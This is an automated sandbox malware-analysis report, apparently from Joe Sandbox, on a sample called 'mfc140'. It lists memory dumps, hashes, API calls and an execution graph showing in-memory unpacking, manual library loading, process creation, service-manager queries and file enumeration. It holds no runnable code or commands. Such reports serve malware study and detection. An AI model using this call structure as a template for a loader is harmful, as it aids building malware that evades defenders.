                                                        • Associated: 0000000C.00000002.2279716653.00000000003EF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_3e0000_mfc140.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 4449bb853b64c0ceeea584fa211025182d9cdbbdb91f0061a87d1818c6ab5cab
                                                        • Instruction ID: 457c94b00617875c7316674a6b8ffb5bf94ed0d44c50ee0a3fa9c49e90bc5543
                                                        • Opcode Fuzzy Hash: 4449bb853b64c0ceeea584fa211025182d9cdbbdb91f0061a87d1818c6ab5cab
                                                        • Instruction Fuzzy Hash: B801A2317142B54B9B27AF7B9C8472B2AAF9FD0748B100369A015CF3D5EE31DD028B80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 002D0F08
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 002D0F3E
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 002D0F7F
                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?), ref: 002D02F6
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2279660601.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_2d0000_mfc140.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$FreeVirtual
                                                        • String ID:
                                                        • API String ID: 223123264-0
                                                        • Opcode ID: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                        • Instruction ID: 136393f4b6b9e60466a3a0c8f61a1ab6dcf14c9a510c847266d2a9f3fbeadf84
                                                        • Opcode Fuzzy Hash: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                        • Instruction Fuzzy Hash: 9D513AB1911268ABDB20DF64DD88BDEB778EF88700F0045DAE509B7260DB745E85CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2279660601.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_2d0000_mfc140.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Eight$Five$Four$Nine$One$Seven$Six$Ten$Three$Two
                                                        • API String ID: 0-211638553
                                                        • Opcode ID: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                        • Instruction ID: 87935a3622729bac05418ffb5e134a489f7b542a2dfe9b629a89898ecbe62a48
                                                        • Opcode Fuzzy Hash: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                        • Instruction Fuzzy Hash: 27311938E511289BCB04DB98CD80AED7BB5EF4C340B50802BD506737A4DB789D86CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2279660601.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_2d0000_mfc140.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove
                                                        • String ID:
                                                        • API String ID: 1951056069-0
                                                        • Opcode ID: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                        • Instruction ID: 3141528e171d2d5a7f9c54192b29c9775318c35bd293e4b53f5a5dc25bce7cdf
                                                        • Opcode Fuzzy Hash: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                        • Instruction Fuzzy Hash: 405192B2A283025BD720DE26C881B5BB3D8ABD4794F04452FF948E7351E235DC249BA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2279660601.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_2d0000_mfc140.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove
                                                        • String ID:
                                                        • API String ID: 1951056069-0
                                                        • Opcode ID: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                        • Instruction ID: 2917d218ac147a0956ab3600468263ea0c57a5f528df01d156992e095249fe59
                                                        • Opcode Fuzzy Hash: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                        • Instruction Fuzzy Hash: B44138B56343025BC314DE69CC85BABB2D8ABC4B51F08483FF644D6354D2B0DD2887A9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:9.4%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:1168
                                                        Total number of Limit Nodes:13

                                                        Graph

                                                        execution_graph 5818 310170 5825 3101fb 5818->5825 5824 3102c4 5871 3106f0 5824->5871 5834 310ad0 5825->5834 5827 3102d0 5888 3108f0 5827->5888 5829 3102dc 5906 310580 5829->5906 5831 3102e8 5832 3102ef VirtualFree 5831->5832 5833 3102fb 5831->5833 5832->5833 5835 310b2f 5834->5835 5836 310bf0 VirtualAlloc 5835->5836 5837 3102ab 5835->5837 5838 310c1c 5836->5838 5840 310d60 5837->5840 5838->5837 5839 310cdb VirtualAlloc 5838->5839 5839->5837 5841 310d94 5840->5841 5842 310da3 VirtualAlloc RtlMoveMemory 5841->5842 5843 3102b8 5842->5843 5849 310ddb 5842->5849 5850 310400 GetCurrentProcess 5843->5850 5845 310e0d RtlMoveMemory 5845->5849 5846 310e3c VirtualAlloc 5846->5849 5847 310e91 RtlFillMemory 5847->5843 5847->5849 5848 310e6a RtlMoveMemory 5848->5843 5848->5849 5849->5843 5849->5846 5849->5847 5849->5848 5914 311140 lstrcpynW 5849->5914 5915 311140 lstrcpynW 5850->5915 5852 310459 NtQueryInformationProcess 5853 31046f 5852->5853 5856 3104c5 5852->5856 5854 310492 GetProcessHeap RtlAllocateHeap GetCurrentProcess NtQueryInformationProcess 5853->5854 5855 310484 GetProcessHeap HeapFree 5853->5855 5858 310575 5853->5858 5854->5853 5854->5856 5855->5854 5857 3104e5 5856->5857 5921 311140 lstrcpynW 5856->5921 5916 311140 lstrcpynW 5857->5916 5861 3104dc RtlMoveMemory 5861->5857 5862 3104ef RtlMoveMemory 5917 311140 lstrcpynW 5862->5917 5864 310511 RtlMoveMemory 5918 311140 lstrcpynW 5864->5918 5866 310528 RtlMoveMemory 5919 311140 lstrcpynW 5866->5919 5868 31053f RtlMoveMemory 5920 311140 lstrcpynW 5868->5920 5870 31055a RtlMoveMemory 5870->5824 5872 310740 5871->5872 5874 310744 5872->5874 5922 310fb0 5872->5922 5874->5827 5875 310770 5875->5874 5878 3107ff LoadLibraryA 5875->5878 5930 311140 lstrcpynW 5875->5930 5877 3107b5 RtlMoveMemory 5877->5875 5879 3108b9 5878->5879 5886 31080f 5878->5886 5879->5827 5881 31082d RtlMoveMemory 5881->5875 5881->5886 5882 310858 GetProcAddress 5882->5874 5882->5886 5884 310872 RtlMoveMemory 5933 311140 lstrcpynW 5884->5933 5886->5874 5886->5875 5886->5882 5887 310890 RtlMoveMemory 5886->5887 5931 311140 lstrcpynW 5886->5931 5932 311140 lstrcpynW 5886->5932 5887->5874 5887->5886 5889 310934 5888->5889 5890 310fb0 2 API calls 5889->5890 5891 310938 5889->5891 5892 310970 5890->5892 5891->5829 5892->5891 5936 311140 lstrcpynW 5892->5936 5894 3109af RtlMoveMemory 5894->5891 5900 3109c2 5894->5900 5897 3109f6 RtlMoveMemory 5897->5900 5898 310a97 RtlMoveMemory 5899 310aac 5898->5899 5898->5900 5899->5829 5900->5891 5937 311140 lstrcpynW 5900->5937 5938 311140 lstrcpynW 5900->5938 5940 311140 lstrcpynW 5900->5940 5902 310a3e RtlMoveMemory 5902->5891 5903 310a57 5902->5903 5939 311140 lstrcpynW 5903->5939 5905 310a61 RtlMoveMemory 5905->5900 5907 3105bc 5906->5907 5908 3105c0 5907->5908 5912 31069b VirtualProtect 5907->5912 5941 311140 lstrcpynW 5907->5941 5942 311140 lstrcpynW 5907->5942 5908->5831 5910 310617 RtlMoveMemory 5910->5907 5912->5907 5913 3106c6 5912->5913 5913->5831 5914->5845 5915->5852 5916->5862 5917->5864 5918->5866 5919->5868 5920->5870 5921->5861 5924 310fda 5922->5924 5923 31104a 5923->5875 5924->5923 5934 311140 lstrcpynW 5924->5934 5926 311001 5935 311140 lstrcpynW 5926->5935 5928 31101b RtlMoveMemory 5929 311029 5928->5929 5929->5875 5930->5877 5931->5881 5932->5884 5933->5886 5934->5926 5935->5928 5936->5894 5937->5897 5938->5902 5939->5905 5940->5898 5941->5910 5942->5907 5996 324b70 5997 324b82 5996->5997 5998 324b98 5996->5998 5999 323f00 GetPEB 5997->5999 6002 324bd7 CreateProcessW 5998->6002 6003 323f00 GetPEB 5998->6003 6000 324b8c 5999->6000 6001 323e60 GetPEB 6000->6001 6001->5998 6004 324c73 6002->6004 6005 324bf7 6002->6005 6006 324bc6 6003->6006 6007 324bff 6005->6007 6010 323f00 GetPEB 6005->6010 6012 324c33 6005->6012 6008 323e60 GetPEB 6006->6008 6009 324bd2 6008->6009 6009->6002 6011 324c27 6010->6011 6013 323e60 GetPEB 6011->6013 6014 324c5d 6012->6014 6015 323f00 GetPEB 6012->6015 6013->6012 6016 324c51 6015->6016 6017 323e60 GetPEB 6016->6017 6017->6014 6888 3264b0 6889 3264d0 6888->6889 6890 3264ba 6888->6890 6894 3242c0 GetPEB 6889->6894 6897 32659a 6889->6897 6891 323f00 GetPEB 6890->6891 6892 3264c4 6891->6892 6893 323e60 GetPEB 6892->6893 6893->6889 6895 32657b 6894->6895 6895->6897 6898 324160 6895->6898 6899 324172 6898->6899 6900 324180 6898->6900 6901 323f00 GetPEB 6899->6901 6900->6897 6902 324177 6901->6902 6903 323e60 GetPEB 6902->6903 6903->6900 6910 3278b0 6920 327990 6910->6920 6911 3234c0 GetPEB 6911->6920 6912 327c1e 6913 327c3d 6912->6913 6915 323f00 GetPEB 6912->6915 6914 327c05 6916 327c31 6915->6916 6917 323e60 GetPEB 6916->6917 6917->6913 6918 323f00 GetPEB 6918->6920 6919 323e60 GetPEB 6919->6920 6920->6911 6920->6912 6920->6914 6920->6918 6920->6919 6921 327fb0 6922 3234c0 GetPEB 6921->6922 6923 327fc2 6922->6923 6924 327fe3 6923->6924 6925 323f00 GetPEB 6923->6925 6927 328029 6924->6927 6929 323f00 GetPEB 6924->6929 6926 327fd7 6925->6926 6928 323e60 GetPEB 6926->6928 6932 328051 6927->6932 6933 323f00 GetPEB 6927->6933 6928->6924 6930 32801d 6929->6930 6931 323e60 GetPEB 6930->6931 6931->6927 6935 32807d 6932->6935 6937 323f00 GetPEB 6932->6937 6934 328045 6933->6934 6936 323e60 GetPEB 6934->6936 6936->6932 6938 328071 6937->6938 6939 323e60 GetPEB 6938->6939 6939->6935 7097 324df0 GetPEB 5943 3230a0 5944 3230ba 5943->5944 5945 3232ab 5944->5945 5946 323f00 GetPEB 5944->5946 5949 323238 5944->5949 5950 323291 RtlAllocateHeap 5944->5950 5952 323e60 GetPEB 5944->5952 5945->5949 5953 323f00 GetPEB 5945->5953 5946->5944 5950->5944 5950->5949 5952->5944 5954 3232bf 5953->5954 5955 323e60 5954->5955 5956 323ebc 5955->5956 5957 323e9c 5955->5957 5956->5949 5957->5956 5958 3240f5 5957->5958 5959 323f00 GetPEB 5957->5959 5962 324126 5958->5962 5963 323f00 GetPEB 5958->5963 5960 3240e9 5959->5960 5961 323e60 GetPEB 5960->5961 5961->5958 5964 323e60 GetPEB 5962->5964 5967 324138 5962->5967 5965 32411a 5963->5965 5968 324157 5964->5968 5966 323e60 GetPEB 5965->5966 5966->5962 5967->5949 5968->5949 6018 325ce0 6026 3265e0 6018->6026 6020 325ce5 6021 325d09 ExitProcess 6020->6021 6022 323f00 GetPEB 6020->6022 6023 325cf8 6022->6023 6024 323e60 GetPEB 6023->6024 6025 325d04 6024->6025 6025->6021 6070 3265fd 6026->6070 6028 3268df 6028->6020 6029 326dcd 6342 32b2e0 6029->6342 6032 32706e 6367 328740 6032->6367 6038 327061 6358 328d40 6038->6358 6043 323f00 GetPEB 6043->6070 6044 327073 6044->6020 6047 326f27 GetTickCount 6047->6070 6051 324220 GetPEB 6051->6070 6052 327066 6052->6020 6055 323e60 GetPEB 6060 326927 6055->6060 6059 323f00 GetPEB 6059->6060 6060->6047 6060->6055 6060->6059 6065 326975 GetTickCount 6060->6065 6064 323e60 GetPEB 6064->6070 6065->6070 6070->6028 6070->6029 6070->6032 6070->6038 6070->6043 6070->6051 6070->6060 6070->6064 6071 324160 GetPEB 6070->6071 6072 328400 6070->6072 6078 327120 6070->6078 6099 328e80 6070->6099 6109 328970 6070->6109 6121 3280a0 6070->6121 6133 329860 6070->6133 6149 329620 6070->6149 6158 3212b0 6070->6158 6179 32afe0 6070->6179 6184 328700 6070->6184 6190 326060 6070->6190 6211 32b430 6070->6211 6218 329f30 6070->6218 6227 3261e0 6070->6227 6239 3294d0 6070->6239 6246 323310 6070->6246 6256 321840 6070->6256 6271 323460 6070->6271 6281 3253d0 6070->6281 6286 329270 6070->6286 6296 328bb0 6070->6296 6306 3272d0 6070->6306 6316 329050 6070->6316 6330 324770 6070->6330 6347 32b1d0 6070->6347 6352 327410 6070->6352 6071->6070 6073 3284e3 6072->6073 6074 328600 CreateFileW 6073->6074 6075 3285bd 6073->6075 6076 323f00 GetPEB 6073->6076 6077 323e60 GetPEB 6073->6077 6074->6073 6074->6075 6075->6070 6076->6073 6077->6073 6082 327125 6078->6082 6079 327233 6385 3234c0 6079->6385 6081 32723f 6084 327265 LoadLibraryW 6081->6084 6085 323f00 GetPEB 6081->6085 6082->6079 6083 327232 6082->6083 6086 327080 GetPEB LoadLibraryW 6082->6086 6083->6070 6087 327290 6084->6087 6088 32727a 6084->6088 6089 327254 6085->6089 6086->6082 6095 3272b8 6087->6095 6096 323f00 GetPEB 6087->6096 6090 323f00 GetPEB 6088->6090 6091 323e60 GetPEB 6089->6091 6092 327284 6090->6092 6093 327260 6091->6093 6094 323e60 GetPEB 6092->6094 6093->6084 6094->6087 6095->6070 6097 3272ac 6096->6097 6098 323e60 GetPEB 6097->6098 6098->6095 6104 328ea0 6099->6104 6100 32901b 6103 323f00 GetPEB 6100->6103 6106 328fc6 6100->6106 6101 328ff2 OpenServiceW 6101->6104 6102 323f00 GetPEB 6102->6104 6105 32902e 6103->6105 6104->6100 6104->6101 6104->6102 6104->6106 6108 323e60 GetPEB 6104->6108 6107 323e60 GetPEB 6105->6107 6106->6070 6107->6106 6108->6104 6118 328991 6109->6118 6110 323f00 GetPEB 6110->6118 6111 3234c0 GetPEB 6111->6118 6112 328b74 6114 328add 6112->6114 6115 323f00 GetPEB 6112->6115 6114->6070 6116 328b87 6115->6116 6117 323e60 GetPEB 6116->6117 6117->6114 6118->6110 6118->6111 6118->6112 6118->6114 6119 323e60 GetPEB 6118->6119 6120 323460 GetPEB 6118->6120 6395 325040 6118->6395 6119->6118 6120->6118 6131 328163 6121->6131 6122 3234c0 GetPEB 6122->6131 6123 328397 CreateFileW 6125 3283e6 6123->6125 6123->6131 6124 3283c7 6124->6125 6128 323f00 GetPEB 6124->6128 6125->6070 6126 328358 6126->6070 6127 323f00 GetPEB 6127->6131 6129 3283da 6128->6129 6130 323e60 GetPEB 6129->6130 6130->6125 6131->6122 6131->6123 6131->6124 6131->6126 6131->6127 6132 323e60 GetPEB 6131->6132 6132->6131 6148 329880 6133->6148 6134 329b02 6137 329b26 SHGetFolderPathW 6134->6137 6138 323f00 GetPEB 6134->6138 6135 3299b2 OpenSCManagerW 6135->6148 6136 329af5 6136->6070 6420 323040 6137->6420 6143 329b15 6138->6143 6139 329a66 CloseServiceHandle 6139->6148 6142 329969 SHGetFolderPathW 6142->6148 6144 323e60 GetPEB 6143->6144 6146 329b21 6144->6146 6145 323f00 GetPEB 6145->6148 6146->6137 6147 323e60 GetPEB 6147->6148 6148->6134 6148->6135 6148->6136 6148->6139 6148->6142 6148->6145 6148->6147 6425 327c60 6148->6425 6157 329630 6149->6157 6150 32981f 6150->6070 6151 329829 6449 323780 6151->6449 6153 329839 6153->6070 6154 323f00 GetPEB 6154->6157 6155 3234c0 GetPEB 6155->6157 6156 323e60 GetPEB 6156->6157 6157->6150 6157->6151 6157->6154 6157->6155 6157->6156 6168 3212e1 6158->6168 6160 32181c 6578 324220 6160->6578 6161 324220 GetPEB 6161->6168 6163 3234c0 GetPEB 6163->6168 6164 3242c0 GetPEB 6164->6168 6166 3217d1 6166->6070 6168->6160 6168->6161 6168->6163 6168->6164 6168->6166 6170 323e60 GetPEB 6168->6170 6172 323f00 GetPEB 6168->6172 6173 321641 _snwprintf 6168->6173 6178 323460 GetPEB 6168->6178 6476 321fc0 6168->6476 6484 321e70 6168->6484 6493 325c00 6168->6493 6512 321c70 6168->6512 6528 322230 6168->6528 6536 322be0 6168->6536 6551 324ea0 6168->6551 6556 321900 6168->6556 6170->6168 6172->6168 6176 323460 GetPEB 6173->6176 6176->6168 6178->6168 6180 32b101 6179->6180 6183 32aff8 6179->6183 6180->6070 6181 323e60 GetPEB 6181->6183 6182 323f00 GetPEB 6182->6183 6183->6180 6183->6181 6183->6182 6185 32871f 6184->6185 6186 328709 6184->6186 6185->6070 6187 323f00 GetPEB 6186->6187 6188 328713 6187->6188 6189 323e60 GetPEB 6188->6189 6189->6185 6620 325500 6190->6620 6192 32613c 6195 3235c0 GetPEB 6192->6195 6193 326134 6193->6070 6194 323f00 GetPEB 6196 326074 6194->6196 6197 326147 6195->6197 6196->6192 6196->6193 6196->6194 6198 323e60 GetPEB 6196->6198 6199 323f00 GetPEB 6197->6199 6203 326168 6197->6203 6198->6196 6200 32615c 6199->6200 6201 323e60 GetPEB 6200->6201 6201->6203 6202 3261a2 6207 3261ca 6202->6207 6208 323f00 GetPEB 6202->6208 6203->6202 6204 323f00 GetPEB 6203->6204 6205 326196 6204->6205 6206 323e60 GetPEB 6205->6206 6206->6202 6207->6070 6209 3261be 6208->6209 6210 323e60 GetPEB 6209->6210 6210->6207 6213 32b440 6211->6213 6212 32b4ba 6212->6070 6213->6212 6630 32ab50 6213->6630 6646 32a170 6213->6646 6667 32a7a0 6213->6667 6687 32a5e0 6213->6687 6225 329f40 6218->6225 6219 32a01b 6220 329f64 6219->6220 6221 323f00 GetPEB 6219->6221 6220->6070 6222 32a02e 6221->6222 6223 323e60 GetPEB 6222->6223 6223->6220 6224 323f00 GetPEB 6224->6225 6225->6219 6225->6220 6225->6224 6226 323e60 GetPEB 6225->6226 6226->6225 6236 326202 6227->6236 6228 3242c0 GetPEB 6228->6236 6230 32624b 6230->6070 6232 323e60 GetPEB 6232->6236 6233 323f00 GetPEB 6233->6236 6234 326490 6234->6070 6235 323f00 GetPEB 6237 32642d 6235->6237 6236->6228 6236->6230 6236->6232 6236->6233 6236->6237 6801 3255b0 6236->6801 6810 324c80 6236->6810 6237->6234 6237->6235 6238 323e60 GetPEB 6237->6238 6238->6237 6241 3294f0 6239->6241 6240 3295c2 6240->6070 6241->6240 6243 324c80 GetPEB 6241->6243 6244 323f00 GetPEB 6241->6244 6245 323e60 GetPEB 6241->6245 6819 3246c0 6241->6819 6243->6241 6244->6241 6245->6241 6247 32334a 6246->6247 6248 32336f 6247->6248 6249 323f00 GetPEB 6247->6249 6252 323f00 GetPEB 6248->6252 6255 323397 6248->6255 6250 323363 6249->6250 6251 323e60 GetPEB 6250->6251 6251->6248 6253 32338b 6252->6253 6254 323e60 GetPEB 6253->6254 6254->6255 6255->6070 6257 321862 6256->6257 6258 32184c 6256->6258 6262 323f00 GetPEB 6257->6262 6266 32188b 6257->6266 6259 323f00 GetPEB 6258->6259 6260 321856 6259->6260 6261 323e60 GetPEB 6260->6261 6261->6257 6263 32187f 6262->6263 6264 323e60 GetPEB 6263->6264 6264->6266 6265 3218ee 6265->6070 6266->6265 6266->6266 6834 3225e0 6266->6834 6268 3218d8 6269 3218dc 6268->6269 6270 324220 GetPEB 6268->6270 6269->6070 6270->6265 6272 32346d 6271->6272 6277 323483 6271->6277 6273 323f00 GetPEB 6272->6273 6274 323477 6273->6274 6276 323e60 GetPEB 6274->6276 6275 3234ab 6275->6070 6276->6277 6277->6275 6278 323f00 GetPEB 6277->6278 6279 32349f 6278->6279 6280 323e60 GetPEB 6279->6280 6280->6275 6282 3253e0 6281->6282 6283 323f00 GetPEB 6282->6283 6284 3254b4 6282->6284 6285 323e60 GetPEB 6282->6285 6283->6282 6284->6070 6285->6282 6294 329290 6286->6294 6288 32949c 6289 329410 6288->6289 6290 323f00 GetPEB 6288->6290 6289->6070 6291 3294af 6290->6291 6292 323e60 GetPEB 6291->6292 6292->6289 6293 323f00 GetPEB 6293->6294 6294->6288 6294->6289 6294->6293 6295 323e60 GetPEB 6294->6295 6849 321000 6294->6849 6295->6294 6303 328bc4 6296->6303 6297 328d1d 6858 3236b0 6297->6858 6298 323780 2 API calls 6298->6303 6300 328d10 6300->6070 6302 3234c0 GetPEB 6302->6303 6303->6297 6303->6298 6303->6300 6303->6302 6304 323f00 GetPEB 6303->6304 6305 323e60 GetPEB 6303->6305 6304->6303 6305->6303 6307 3272d9 6306->6307 6310 3272ef 6306->6310 6308 323f00 GetPEB 6307->6308 6309 3272e3 6308->6309 6311 323e60 GetPEB 6309->6311 6312 323f00 GetPEB 6310->6312 6314 327318 6310->6314 6311->6310 6313 32730c 6312->6313 6315 323e60 GetPEB 6313->6315 6314->6070 6315->6314 6328 329070 6316->6328 6317 3291de 6317->6070 6318 3291e4 6319 32921f 6318->6319 6320 323f00 GetPEB 6318->6320 6324 329247 6319->6324 6325 323f00 GetPEB 6319->6325 6321 329213 6320->6321 6323 323e60 GetPEB 6321->6323 6322 323e60 GetPEB 6322->6328 6323->6319 6324->6070 6326 32923b 6325->6326 6329 323e60 GetPEB 6326->6329 6327 323f00 GetPEB 6327->6328 6328->6317 6328->6318 6328->6322 6328->6327 6329->6324 6331 324785 6330->6331 6339 32479b 6330->6339 6332 323f00 GetPEB 6331->6332 6334 32478f 6332->6334 6333 3247cb GetCurrentProcessId 6338 3247d5 6333->6338 6336 323e60 GetPEB 6334->6336 6335 323f00 GetPEB 6337 3247b7 6335->6337 6336->6339 6340 323e60 GetPEB 6337->6340 6338->6070 6339->6333 6339->6335 6341 3247c3 6340->6341 6341->6333 6346 32b2ec 6342->6346 6343 32b422 6343->6028 6344 323f00 GetPEB 6344->6346 6345 323e60 GetPEB 6345->6346 6346->6343 6346->6344 6346->6345 6350 32b1e0 6347->6350 6348 32b2b2 6348->6070 6349 323f00 GetPEB 6349->6350 6350->6348 6350->6349 6351 323e60 GetPEB 6350->6351 6351->6350 6356 327420 6352->6356 6353 327608 6353->6070 6354 323f00 GetPEB 6354->6356 6355 324fd0 GetPEB 6355->6356 6356->6353 6356->6354 6356->6355 6357 323e60 GetPEB 6356->6357 6357->6356 6365 328d50 6358->6365 6359 328e3f 6360 324b70 2 API calls 6359->6360 6362 328e4f 6360->6362 6361 328e29 6361->6052 6362->6052 6363 3234c0 GetPEB 6363->6365 6364 323f00 GetPEB 6364->6365 6365->6359 6365->6361 6365->6363 6365->6364 6366 323e60 GetPEB 6365->6366 6366->6365 6371 328753 6367->6371 6368 3234c0 GetPEB 6368->6371 6369 328903 6375 323f00 GetPEB 6369->6375 6376 328922 6369->6376 6371->6368 6371->6369 6372 3288df 6371->6372 6373 328e80 2 API calls 6371->6373 6374 323f00 GetPEB 6371->6374 6382 323780 2 API calls 6371->6382 6383 323e60 GetPEB 6371->6383 6877 327700 6371->6877 6372->6044 6373->6371 6374->6371 6377 328916 6375->6377 6378 328955 6376->6378 6380 323f00 GetPEB 6376->6380 6379 323e60 GetPEB 6377->6379 6378->6044 6379->6376 6381 328949 6380->6381 6384 323e60 GetPEB 6381->6384 6382->6371 6383->6371 6384->6378 6386 3234e3 6385->6386 6387 323f00 GetPEB 6386->6387 6390 323508 6386->6390 6388 3234fc 6387->6388 6389 323e60 GetPEB 6388->6389 6389->6390 6391 323f00 GetPEB 6390->6391 6394 323530 6390->6394 6392 323524 6391->6392 6393 323e60 GetPEB 6392->6393 6393->6394 6394->6081 6394->6394 6409 32505c 6395->6409 6396 325367 6397 325386 6396->6397 6398 323f00 GetPEB 6396->6398 6399 3253ae 6397->6399 6402 323f00 GetPEB 6397->6402 6400 32537a 6398->6400 6399->6118 6401 323e60 GetPEB 6400->6401 6401->6397 6406 3253a2 6402->6406 6403 32534d RtlAllocateHeap 6403->6399 6403->6409 6405 323f00 GetPEB 6405->6409 6407 323e60 GetPEB 6406->6407 6407->6399 6408 323e60 GetPEB 6408->6409 6409->6396 6409->6399 6409->6403 6409->6405 6409->6408 6410 3242c0 6409->6410 6411 3242e3 6410->6411 6412 3242cd 6410->6412 6416 32430b 6411->6416 6417 323f00 GetPEB 6411->6417 6413 323f00 GetPEB 6412->6413 6414 3242d7 6413->6414 6415 323e60 GetPEB 6414->6415 6415->6411 6416->6409 6418 3242ff 6417->6418 6419 323e60 GetPEB 6418->6419 6419->6416 6421 323050 6420->6421 6423 32307a 6421->6423 6435 3238f0 6421->6435 6423->6136 6424 323092 6424->6136 6432 327c80 6425->6432 6426 327d97 6426->6148 6427 327ddd 6429 327dfd 6427->6429 6431 323f00 GetPEB 6427->6431 6428 323f00 GetPEB 6428->6432 6429->6148 6430 323e60 GetPEB 6430->6432 6433 327df1 6431->6433 6432->6426 6432->6427 6432->6428 6432->6430 6434 323e60 GetPEB 6433->6434 6434->6429 6443 323910 6435->6443 6436 323a3b FindFirstFileW 6436->6443 6446 323b8f 6436->6446 6437 323ac1 6437->6424 6438 323b70 6440 323f00 GetPEB 6438->6440 6438->6446 6439 323f00 GetPEB 6439->6443 6442 323b83 6440->6442 6441 323e60 GetPEB 6441->6443 6444 323e60 GetPEB 6442->6444 6443->6436 6443->6437 6443->6438 6443->6439 6443->6441 6445 3234c0 GetPEB 6443->6445 6447 3238f0 GetPEB 6443->6447 6448 323460 GetPEB 6443->6448 6444->6446 6445->6443 6446->6424 6447->6443 6448->6443 6450 3237ab 6449->6450 6451 323795 6449->6451 6454 3237dd 6450->6454 6456 323f00 GetPEB 6450->6456 6452 323f00 GetPEB 6451->6452 6453 32379f 6452->6453 6455 323e60 GetPEB 6453->6455 6459 323812 6454->6459 6460 323f00 GetPEB 6454->6460 6455->6450 6457 3237d1 6456->6457 6458 323e60 GetPEB 6457->6458 6458->6454 6462 32384a 6459->6462 6464 323f00 GetPEB 6459->6464 6461 323806 6460->6461 6463 323e60 GetPEB 6461->6463 6467 323876 6462->6467 6468 323f00 GetPEB 6462->6468 6463->6459 6465 32383e 6464->6465 6466 323e60 GetPEB 6465->6466 6466->6462 6470 3238d1 SHFileOperationW 6467->6470 6472 323f00 GetPEB 6467->6472 6469 32386a 6468->6469 6471 323e60 GetPEB 6469->6471 6470->6153 6471->6467 6473 3238c0 6472->6473 6474 323e60 GetPEB 6473->6474 6475 3238cc 6474->6475 6475->6470 6482 321fd2 6476->6482 6477 322212 6478 322208 6477->6478 6480 324220 GetPEB 6477->6480 6478->6168 6479 3242c0 GetPEB 6479->6482 6480->6478 6481 323f00 GetPEB 6481->6482 6482->6477 6482->6478 6482->6479 6482->6481 6483 323e60 GetPEB 6482->6483 6483->6482 6492 321e86 6484->6492 6485 321f77 6486 321f68 6485->6486 6487 323f00 GetPEB 6485->6487 6486->6168 6488 321f98 6487->6488 6490 323e60 GetPEB 6488->6490 6489 323f00 GetPEB 6489->6492 6490->6486 6491 323e60 GetPEB 6491->6492 6492->6485 6492->6486 6492->6489 6492->6491 6494 325c10 6493->6494 6495 325c26 6493->6495 6496 323f00 GetPEB 6494->6496 6499 323f00 GetPEB 6495->6499 6503 325c4e 6495->6503 6497 325c1a 6496->6497 6498 323e60 GetPEB 6497->6498 6498->6495 6500 325c42 6499->6500 6501 323e60 GetPEB 6500->6501 6501->6503 6502 325cd2 6502->6168 6503->6502 6504 325c99 6503->6504 6505 323f00 GetPEB 6503->6505 6508 323f00 GetPEB 6504->6508 6511 325cc1 6504->6511 6506 325c8d 6505->6506 6507 323e60 GetPEB 6506->6507 6507->6504 6509 325cb5 6508->6509 6510 323e60 GetPEB 6509->6510 6510->6511 6511->6168 6513 321cf0 6512->6513 6514 321d06 6512->6514 6515 323f00 GetPEB 6513->6515 6518 323f00 GetPEB 6514->6518 6521 321dad 6514->6521 6516 321cfa 6515->6516 6517 323e60 GetPEB 6516->6517 6517->6514 6519 321da1 6518->6519 6520 323e60 GetPEB 6519->6520 6520->6521 6522 323f00 GetPEB 6521->6522 6523 321de1 6521->6523 6524 321dd5 6522->6524 6526 324ea0 GetPEB 6523->6526 6525 323e60 GetPEB 6524->6525 6525->6523 6527 321e15 6526->6527 6527->6168 6529 322255 6528->6529 6530 32229c 6529->6530 6531 323f00 GetPEB 6529->6531 6532 3225be 6529->6532 6534 323e60 GetPEB 6529->6534 6530->6168 6531->6529 6533 3225cd 6532->6533 6535 324220 GetPEB 6532->6535 6533->6168 6534->6529 6535->6533 6548 322c1a 6536->6548 6537 322fcf 6540 322fee 6537->6540 6541 323f00 GetPEB 6537->6541 